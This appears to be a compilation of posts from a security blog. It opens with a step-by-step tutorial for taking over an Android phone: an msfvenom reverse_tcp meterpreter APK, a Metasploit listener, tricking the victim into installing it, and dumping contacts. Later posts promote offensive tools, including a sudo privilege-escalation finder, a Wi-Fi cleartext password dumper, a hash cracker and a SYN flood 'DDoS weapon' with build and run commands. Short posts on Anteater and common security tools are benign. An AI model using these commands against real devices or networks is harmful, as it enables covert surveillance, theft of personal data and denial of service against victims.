In this article, we are going to learn how to hack an Android phone using Metasploit framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile Penetration Testing.

Here we are using Kali Linux to attack the target. The target has set to be an Android Phone and for that we are using an Android virtual machine. Of course, there are going to be some limitations and differences between a virtual Android and a physical Android device but for the purpose of learning pentesting it is recommended to conduct this test on a virtual device.

We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.

Step by step Tutorial

Generating a Payload with msfvenom

At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.

After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:

# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk

Where:

• -p indicates a payload type
• android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
• LHOST is your local IP
• LPORT is set to be as a listening port
• R> /var/www/html would give the output directly on apache server
• apk is the final name of the final output

This would take some time to generate an apk file of almost ten thousand bytes.

Launching an Attack

Before launching attack, we need to check the status of the apache server. Type command:

# service apache2 status

All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.

In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.

After downloading it successfully, select the app to install.

So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.

Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.

Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.

Post Exploitation

Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.

You can interact with any session by typing sessions -i [session ID]

After entering the session, type “help” to list down all the commands we can put forward in this session.

You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.

You will also find some network commands including portfwd and route

Some powerful system commands to get user ID, get a shell or getting the complete system information.

Type “app_list” and it will show you all the installed apps on the device

We also have the power to uninstall any app from the Android device

Extracting Contacts from an Android Device

Now let extract some contacts from the target device by typing “dump” and double tab

It will show all the options to extract from the device. Type “dump_contacts” and enter

It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”

This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.

There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.

A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

The post How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux appeared first on Tech Chronicles.

Wifi-Hacker is a Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2)

The post Wifi-Hacker – Shell Script For Attacking Wireless Connections Using Built-In Kali Tools appeared first on Tech Chronicles.

This post describes how to obtain Linux Privilege Escalation through SUDO abuse.

The tool can be used by pentesters, system admins, CTF players, students, System Auditors and trolls :).


INTRO
**WARNING: SUDO_KILLER is part of the KILLER project. SUDO_KILLER is still under development and there might be some issues, please create an issue if you found any. **
Other tool will be added to the KILLER project in the coming months so stay tuned up.

Overview
SUDO_KILLER is a tool that can be used for privilege escalation on linux environment by abusing SUDO in several ways. The tool helps to identify misconfiguration within sudo rules, vulnerability within the version of sudo being used (CVEs and vulns) and the use of dangerous binary, all of these could be abused to elevate privilege to ROOT.
SUDO_KILLER will then provide a list of commands or local exploits which could be exploited to elevate privilege. It is worth noting that the tool does not perform any exploitation on your behalf, the exploitation will need to be performed manually and this is intended.

Features

Some of the checks/functionalities that are performed by the tool:

• Misconfigurations
• Dangerous Binaries
• Vulnerable versions of sudo – CVEs
• Dangerous Environment Variables
• Credential Harvesting
• Writable directories where scripts reside
• Binaries that might be replaced
• Identify missing scripts

What version 2 of SK includes:

• New checks and/or scenarios:

1. CVE-2019-14287 – runas
2. No CVE yet – sudoedit – absolute path
3. CVE-2019-18634 – pwfeedback
4. User Impersonation
5. list of users in sudo group

• Performance improved
• Bugs corrected (checks, export, report,…)
• Continous improvement of the way output presented
• New videos will be added soon
• Annonying password input several time removed
• New functionality: offline mode – ability to extract the required info from audited system and run SK on host.
• Testing environment : A docker to play with the tool and different scenarios, you can also train on PE.

Usage

Example Online mode

./sudo_killer.sh -c -e -r report.txt -p /tmp

Example Offline mode
Run extract.sh on system to be audited/victim machine. Copy the output from /tmp/sk_offline.txt on the system to be audited/victim machine to your host.

• Note: Three checks are missing in the offline mode, still in dev… coming soon…

Run SK with the below parameter:

./sudo_killer.sh -c -i /path/sk_offline.txt

Optional arguments

• -c : include CVE checks with respect to sudo version
• -i : import (offline mode) from extract.sh
• -e : include export of sudo rules / sudoers file
• -r : report name (save the output)
• -p : path where to save export and report
• -s : supply user password for sudo checks (not recommended ++except for CTF)
• -h : help

CVEs check
To update the CVE database : run the following script ./cve_update.sh

Providing password (Important)
If you need to input a password to run sudo -l then the script will not work if you don’t provide a password with the argument -s.

How to run SK on the targetted/audited machine
If you are on a machine that has internet connection, just git clone the tool and run it. If you are on a machine that does not have internet, then git clone on your host, compress the tool (tar) then transfert the compressed file via http/smb (apache web server / python simplehttpserver / smb server / nc) then uncompressed the file on the targeted system and enjoy!

Notes
**NOTE : sudo_killer does not exploit automatically by itself, it was designed like this on purpose but check for misconguration and vulnerabilities and then propose you the following (if you are lucky the route to root is near!) :

• a list of commands to exploit
• a list of exploits
• some description on how and why the attack could be performed

Why is it possible to run “sudo -l” without a password?
By default, if the NOPASSWD tag is applied to any of the entries for a user on a host, he or she will be able to run “sudo -l” without a password. This behavior may be overridden via the verifypw and listpw options.
However, these rules only affect the current user, so if user impersonation is possible (using su) sudo -l should be launched from this user as well.
Sometimes the file /etc/sudoers can be read even if sudo -l is not accessible without password.

Docker – Vulnerable testing environment
**IMPORTANT: The recommended way to test the tool is to use the docker image created on purpose for the testing. The image contained several vulnerabilities and misconfigurations related to the usage of SUDO.
Everything is tested from the Docker container available on Docker Hub !**

A Docker image is available on Docker Hub and automatically re-built at each update: https://hub.docker.com/r/th3xace/sudo_killer_demo . It is initially based on official debian:jessie Docker image (debian:jessie).

1. Pull SUDO_KILLER_DEMO Docker Image from the docker hub (This version maybe a bit more up-to-date):
   

   service docker start
   docker pull th3xace/sudo_killer_demo
   docker run --rm -it th3xace/sudo_killer_demo

2. Build locally from Dockerfile :
   

   service docker start
   git clone https://github.com/TH3xACE/SUDO_KILLER.git
   cd SUDO_KILLER
   docker build -t th3xace/sudo_killer_demo .
   docker run --rm -it th3xace/sudo_killer_demo

Note: It is important to note that the docker is just an environment that can be used to play with the tool since it contains several vulns to exploit. The tool is meant to be used on its own.

Demos
Several videos are provided below with different scenarios of exploitation.

Disclaimer
This script is for Educational purpose ONLY. Do not use it without permission. We are not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of the script is not our responsibility.

Download SUDO_KILLER

The post SUDO_KILLER – A Tool To Identify And Exploit Sudo Rules’ Misconfigurations And Vulnerabilities Within Sudo appeared first on Tech Chronicles.

What’s PAKURI
In Japanese, imitating is called “Pakuru”.

ぱくる (godan conjugation, hiragana and katakana パクる, rōmaji pakuru)

1. eat with a wide open mouth
2. steal when one isn’t looking, snatch, swipe
3. copy someone’s idea or design
4. nab, be caught by the police

Wiktionary:ぱくる

Description

Pentesters love to move their hands. However, I do not like troublesome work. Simple work is performed semi-automatically with simple operations. PAKURI executes commands frequently used in penetration tests by simply operating the numeric keypad. You can test penetration as if you were playing a fighting game.

Abilities of “PAKURI”.

• Intelligence gathering.
• Vulnerability analysis.
• Visualize.
• Brute Force Attack.
• Exploitation.

Your benefits.

By using our PAKURI, you will benefit from the following.
For redteam:
(a) This saves you the trouble of entering frequently used commands.
(b) Beginner pentester can learn the floe of attacks using PAKURI.
For blueteam:
(c) Attack packets can be generated with a simple operation.

NOTE
If you are interested, please use them in an environment under your control and at your own risk. And, if you execute the PAKURI on systems that are not under your control, it may be considered an attack and you may have legally liabillity for your action.

Features

• Scan
  • Nmap
  • AutoRecon
  • OpenVAS
• Exploit
  • BruteSpray
  • Metasploit
• Visualize
  • Faraday
• CUI-GUI switching

Install
bash install.sh

Usage
root@kali:/usr/share/pakuri# ./pakuri.sh

Main

Scanning

Exploit

Config

Command

Operation check environment

• OS: KAli Linux 2019.4
• Memory: 8.0GB

This tool is not yet complete. It will be updated sequentially.

The post PAKURI – Penetration Test Achieve Knowledge Unite Rapid Interface appeared first on Tech Chronicles.

Anteater is a CI/CD Security Gate Check Framework to prevent the unwanted merging of nominated strings, filenames, binaries, deprecated functions, staging environment code/credentials etc.

It’s main function is to block content based on regular expressions.

Anything that can be specified with regular expression syntax, can be sniffed out by Anteater. You tell Anteater exactly what you don’t want to get merged, and anteater looks after the rest.

How Anteater CI/CD Security Gate Check Framework Works

If Anteater finds something, it exits with a non-zero code which in turn fails the build of your CI tool, with the idea that it would prevent a pull request merging. Any false positives are easily negated by using the same RegExp framework to cancel out the false match.

Entire projects may also be scanned also, using a recursive directory walk. With a few simple steps, it can be easily implemented into a CI/CD workflow with tooling such as Travis CI, CircleCI, Gitlab CI/CD and Jenkins.

Anteater also provides integrates with the Virus Total API, so any binaries, public IP addresses or URL’s found by Anteater, will be sent to the Virus Total API and a report will be returned. If any object is reported as malicious, it will fail the CI build job.

You can also set it to block all binaries or tamper with existing binaries (this includes PDFs, Images etc.) and you can whitelist desired binaries using a SHA256 checksum.

Using Anteater CI/CD Security Gate Checks

There is some excellent documentation for Anteater here:

Docs » Anteater – CI/CD Gate Check Framework

This includes how to get it working with CircleCI which is my personal choice for CI tooling.

In order to use the VirusTotal API, you will first require an API key. These are free to get and can be obtained by signing up to the service here.

Once you have your key, it needs to be set as an environment variable.

You can download Anteater here:

anteater-master.zip

Or read more here.

The post Anteater – CI/CD Security Gate Check Framework appeared first on Tech Chronicles.

WiFi-Dumper is an open-source Python-based tool to dump WiFi profiles and cleartext passwords of the connected access points on a Windows machine. This tool will help you in a Wifi penetration testing and could also be useful when performing red team assessments or internal infrastructure engagements.

Each option in the tool generates the “.txt” file as an output, if you run the tool multiple times, the output gets appended to the previous results.

Features of WiFi-Dumper – Dump WiFi Profiles and Cleartext Passwords

Option 1: Shows the wireless networks available to the system. If the interface name is given, only the networks on the given interface will be listed. Otherwise, all networks visible to the system will be listed.

Option 2: Shows a list of wireless profiles configured on the system.

Option 3: Shows the allowed and blocked the wireless network list.

Option 4: Shows a list of all the wireless LAN interfaces on the system.

Option 5: Generates a detailed report about each wireless access point profile on the system. Group Policy Profiles are read-only. User Profiles are readable and writeable, and the preference order can be changed.

Option 6: Dumps the cleartext passwords of every wireless profile on the system. Make sure to generate the profile file (by selecting option 2) before running this option. Always run this as an administrator user to see the cleartext password. User needs to provide the individual wireless name by reading the profile names (option 7).

Option 7: It opens the list of wireless profiles on the system using notepad.

Option 8: It saves WLAN profiles to XML files.

Option 9: Exit gracefully.

You can download WiFi-Dumper here:

Wifi-Dumper-master.zip

Or read more here.

The post WiFi-Dumper – Dump WiFi Profiles and Cleartext Passwords appeared first on Tech Chronicles.

aSYNcrone is a C language based, mulltifunction SYN Flood DDoS Weapon. Disable the destination system by sending a SYN packet intensively to the destination.

aSYNcrone’s POWER!!!

USAGE
git clone https://github.com/fatih4842/aSYNcrone.git
cd aSYNcrone
gcc aSYNcrone.c -o aSYNcrone -lpthread
./aSYNcrone <source port> <target IP> <target port> <thread number>

Specifications

• Internal random IP generator
• Using threads and faster prepare and sending SYN packets
• Different IP Identification number

The post aSYNcrone – A SYN Flood DDoS Tool appeared first on Tech Chronicles.

This is hashcobra Hash Cracking tool.

Usage

$ ./hashcobra -H
--==[ hashcobra by sepehrdad ]==--

usage:

  hashcobra -o <opr> [options] | [misc]

options:

  -a <alg>     - hashing algorithm [default: md5]
               - ? to list available algorithms
  -c <alg>     - compression algorithm [default: zstd]
               - ? to list available algorithms
  -h <hash>    - hash to crack
  -r <path>    - rainbow table path [default: hashcobra.db]
  -d <path>    - dictionary file path
  -o <opr>     - operation to do
               - ? to list available operations
misc:

  -V           - show version
  -H           - show help

example:

  # Create md5 rainbow table with zstd compression from rockyou.txt
  $ hashcobra -o create -d rockyou.txt

  # Create sha512 rainbow table wit   h no compression from darkc0de.lst
  $ hashcobra -o create -a sha512 -c none -r rt.db -d darkc0de.lst

  # Crack 1a1dc91c907325c69271ddf0c944bc72 using rt.db
  $ hashcobra -h 1a1dc91c907325c69271ddf0c944bc72 -r rt.db

Description
This tool uses Rainbow tables for cracking hashes
This makes it to be really fast and a lot faster than traditional hash cracker.

Build Prerequisites

• Make is required.
• GCC 8.0 or above is required.
• Rocksdb most recent verison is required.
• Openssl most recent verison is required.

Building

$ make

LEGAL NOTICE
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.

The post HashCobra – Hash Cracking Tool appeared first on Tech Chronicles.

In the world of cyber security, there are thousands of open source security tools with both defensive and offensive security capabilities that many professionals prefer to assess systems. The following are 4 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the essential rating due to the fact that they are effective, well supported and easy to start getting value from.

Nmap:

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

Metasploit Framework:

Metasploit framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants.

Wireshark:

Wireshark is a fantastic open source, multi-platform network protocol analyzer that allows examining the data from a live network or from a capture file on disk. It enables us to capture data and take a deep look into packet details. It also supports hundreds of protocols and media types. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Nikto:

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. Nikto is great for firing at a web server to find known vulnerable scripts, configuration mistakes and related security problems.

These security tools are well known and are updated by the providers to allow effective use. However, there are many other security tools as well which are being used by many professional as per their requirements.

The post 4 Fundamental Open Source Security Tools appeared first on Tech Chronicles.